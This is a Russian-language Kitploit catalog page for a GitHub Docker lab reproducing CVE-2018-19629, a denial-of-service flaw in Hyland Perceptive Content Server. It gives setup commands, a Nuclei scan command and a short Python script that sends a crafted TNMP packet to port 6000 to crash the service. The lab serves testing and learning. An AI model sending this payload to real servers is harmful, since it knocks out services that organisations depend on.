Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2018-19629 — Hyland Perceptive Content Server - Отказ в обслуживании | Kitploit
Инструменты/GitHubGitHub/excellencedev/cve-2018-19629
Безопасность контейнеровАнализ уязвимостейЭксплуатацияОбучение и ОбразованиеЛаборатории и Практика
GitHubexcellencedev/cve-2018-19629

CVE-2018-19629

Hyland Perceptive Content Server - Отказ в обслуживании

Репозиторий
8 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Тестовая среда для CVE-2018-19629

Тестовая среда Docker для CVE-2018-19629 - отказ в обслуживании сервера Hyland Perceptive Content Server.

Детали уязвимости

ПолеЗначение
Идентификатор CVECVE-2018-19629
СерьезностьВысокая (DoS)
Затронутые версииHyland Perceptive Content Server < 7.1.5
Исправленная версия7.1.5

Описание

Hyland Perceptive Content Server до версии 7.1.5 содержит уязвимость отказа в обслуживании, вызванную аварийным завершением службы ImageNow Server через TCP-соединение. Злоумышленники могут нарушить работу службы, отправляя специально созданные TCP-пакеты, содержащие последовательность заголовков TNMP.

Быстрый старт

root@kitploit:~
# Запустите уязвимую среду
docker-compose up -d

# Проверьте, что он слушает
# (Возможно, понадобится netcat или аналогичный инструмент)
nc -zv localhost 6000

Тестирование с помощью Nuclei

root@kitploit:~
# Тестируйте с помощью шаблона nuclei
nuclei -t ../network/cves/2018/CVE-2018-19629.yaml -u localhost:6000

Ручная проверка

Вы можете вручную вызвать сбой с помощью Python:

root@kitploit:~
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("localhost", 6000))
# The crafted packet
payload = b'\x54\x4e\x4d\x50\x04\x00\x00\x00\x54\x4e\x4d\x45\x00\x00\x04\x00'
s.send(payload)
s.close()

Проверьте журналы, чтобы увидеть сбой:

root@kitploit:~
docker logs -f imagenow-vuln

Вы должны увидеть: [!] CRITICAL: Recevied malicious 'TNMP' packet... после чего контейнер перезапустится.

Детали среды

  • Порт: 6000 (TCP)
  • Протокол: Пользовательский TCP (ImageNow)

Очистка

root@kitploit:~
docker-compose down
Скачать инструмент